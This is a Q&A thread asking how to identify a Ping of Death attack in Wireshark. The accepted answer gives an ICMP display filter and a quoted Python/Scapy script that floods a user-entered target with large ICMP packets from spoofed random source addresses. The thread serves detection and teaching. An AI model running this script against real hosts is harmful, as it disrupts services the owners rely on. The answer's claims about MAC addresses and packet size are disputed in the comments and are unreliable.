# How to identify a Ping of Death attack by analyzing its packet in Wireshark?

Tags: denial-of-service, wireshark, ping

I've tried researching it for a long while, but came out dry.

Comment: Very basic but here is your response https://en.wikipedia.org/wiki/Ping_of_death

Comment: The wiki page for the topic explains what to look for.

Answer (score 1, accepted):

Remember that `ping` is merely an ICMP echo request. So, applying the 'ICMP' display filter in Wireshark will show only this traffic. An alternative, `ICMP > 100` can be used to display only ICMP packets larger than the typical ping packet.

[image: Wireshark filter]
[Source](https://toastersecurity.blogspot.com/2015/12/dos-101-ping-of-death.html)

Furthermore, they are Ethernet II frames. Hence, the source MAC address should be from the same MAC address if it *is* a PoD (Ping of Death). It should be noted that a PoD packet is the maximum size of [65,535 bytes](https://www.cloudflare.com/learning/ddos/ping-of-death-ddos-attack/).

Below I have included a Python script which illustrates how this works.

```
from scapy.all import *
import random


def address_spoofer():

    addr = [192, 168, 0 , 1]
    d = '.'
    addr[0] = str(random.randrange(11,197))
    addr[1] = str(random.randrange(0,255))
    addr[2] = str(random.randrange(0,255))
    addr[3] = str(random.randrange(2,254))
    assemebled = addr[0]+d+addr[1]+d+addr[2]+d+addr[3]
    print assemebled
    return assemebled

target = raw_input("Enter the target to attack: ")

while True:

    rand_addr = address_spoofer()
    ip_hdr = IP(src=rand_addr, dst=target)
    packet = ip_hdr/ICMP()/("m"*60000) #send 60k bytes of junk
    send(packet)
```

[Source](https://toastersecurity.blogspot.com/2015/12/dos-101-ping-of-death.html)

See, [DoS 101: The Ping of Death](https://toastersecurity.blogspot.com/2015/12/dos-101-ping-of-death.html) which illustrates this further and shows resource consumption during this type of DoS attack.

Comment: @schroeder I believe the amendments I have made should appropriately answer the question now, addressing the Wireshark issue. I have also provided a definition for PoD from CloudFlare.

Comment: Your Ethernet frames and MAC comments have no applicability to the PoD discussion. The author of the link you include is only making the point about making the difference between a DoS and a DDoS, but that's completely beside the point and unrelated to PoD.